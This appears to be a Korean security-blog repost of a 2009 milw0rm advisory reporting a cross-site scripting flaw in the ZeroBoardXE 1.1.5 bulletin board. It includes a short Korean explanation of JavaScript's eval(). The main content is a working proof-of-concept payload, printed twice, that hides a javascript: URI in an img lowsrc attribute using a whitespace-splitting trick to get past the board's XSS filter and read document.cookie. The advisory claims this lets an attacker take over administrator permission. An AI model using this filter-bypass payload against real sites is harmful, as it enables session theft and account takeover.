POC : <img lowsrc="j a v a s c ri pt:alert((eval(('D'+'o'+'C'+'u'+'M'+'e'+'N'+'t' +'.'+'C'+'o'+'O'+'k'+'I'+'e').toLowerCase())));">
※참고 eval() 함수 Javascript 코드가 맞는가 틀린가를 검증하고 수행한다.
→ 검증 순서 1. 제공된 jsString 문자열이 Javascript로 유효한가 2. Javascript 코드로서 해석하기 우해서 파싱(Parse) 3. 파싱된 내용에서 Javascript 문장 코드를 발견하면 그 내용을 숭 4. 수행 결과 값이 있으면 반환(return)
ZeroBoardXE 1.1.5 (09.01.22) XSS Vulnerability bY make0day@gmail.com Greet to : Flyh4t /************************* ZeroBoardXE (VERSION 1.1.5 (09.01.22))is most famous and widely used bulletin board system of Korea. It is freely available for all platforms that supports PHP and MySQL. I find a XSS vulnerability. By using this vulnerability, Malicious person can occupy administrator permission, It means attacker can control board system fully Here is the details:
**************************/ TEST ON VERSION ZeroBoardXE 1.1.5 (09.01.22) Download : http://www.zeroboard.com /*************************** [0x01] XSS vulnerability
//Developer try to detect XSS hardly, //But That`s not enough.. //The real-hacker can bypass it. //I`m just used 09 trick. //That`s all *************************/
poc: <img lowsrc="j a v a s c ri pt:alert((eval(('D'+'o'+'C'+'u'+'M'+'e'+'N'+'t'+'.'+'C'+'o'+'O'+'k'+'I'+'e').toLowerCase())));">
# milw0rm.com [2009-02-09]
Posted by n3015m
:
'네오이즘'의 보안LAB 블로그입니다........... n3oism@gmail.com by n3015m